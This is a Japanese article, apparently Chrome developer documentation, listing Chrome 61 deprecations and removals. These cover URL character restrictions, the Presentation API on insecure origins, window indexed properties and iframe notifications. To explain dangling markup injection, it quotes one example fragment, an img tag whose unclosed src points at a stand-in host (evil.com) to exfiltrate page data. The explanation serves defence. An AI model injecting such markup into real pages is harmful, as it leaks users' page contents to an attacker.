ほぼすべてのバージョンの Chrome で、プロダクト、そのパフォーマンス、ウェブ プラットフォームの機能に多くの更新と改善が加えられています。この記事では、8 月 3 日時点でベータ版である Chrome 61 の非推奨と削除について説明します。このリストは随時変更される可能性があります。
セキュリティとプライバシー
URL に「\n」と「<」の文字が含まれるリソースをブロックする
ダングル マークアップ挿入と呼ばれるハッキングがあります。これは、切り捨てられた URL を使用して外部エンドポイントにデータを送信するものです。たとえば、<img src='https://evil.com/? を含むページについて考えてみましょう。URL に閉じかっこがないため、ブラウザは次のかっこまで読み取り、そのかっこで囲まれた文字列を 1 つの URL として扱います。
Chrome 61 では、href 属性と src 属性で許可される文字セットを制限することで、この脆弱性を軽減しています。具体的には、Chrome は改行文字(\n)と小なり文字(<)に遭遇すると、URL の処理を停止します。
URL で改行文字と小文字の「<」を使用する正当なユースケースがある場合は、代わりにこれらの文字をエスケープする必要があります。
削除の意向 | Chromestatus トラッカー | Chromium のバグ
安全でないコンテキストでの Presentation API の非推奨と削除
安全でないオリジンでは、Presentation API がハッキング ベクトルとして使用される可能性があることが判明しました。ディスプレイにはアドレスバーがないため、API を使用してコンテンツをなりすますことができます。実行中のプレゼンテーションからデータを漏洩させることも可能です。
安全でないオリジンの強力な機能を削除するという Blink の意向に沿って、安全でないコンテキストでの Presentation API のサポートを非推奨にして削除する予定です。Chrome 61 以降、PresentationRequest.start() は保護されていないオリジンでは機能しなくなります。
削除の意向 | Chromestatus トラッカー | Chromium のバグ
JavaScript
Windows でインデックス付きプロパティの定義を禁止
以前、一部のブラウザでは次のような JavaScript の割り当てが許可されていました。
window[0] = 1;
現在の HTML 仕様では、これは JavaScript 仕様の明示的な違反であると記載されています。そのため、この機能は Chrome 61 で削除されます。Firefox は 2016 年 2 月時点ですでにポリシーに準拠しています。
安全でない iframe からの通知の使用を削除
iframe からの権限リクエストは、包含ページのオリジンとリクエストを行っている iframe のオリジンを区別するのが難しいため、ユーザーを混乱させる可能性があります。リクエストのスコープの明確性が欠けていると、ユーザーは権限を付与または拒否するかどうかを判断することが難しくなります。
iframe での通知を禁止することで、通知権限の要件とプッシュ通知の要件を整合させ、デベロッパーの負担を軽減します。
この機能を必要とするデベロッパーは、新しいウィンドウを開いて通知の権限をリクエストできます。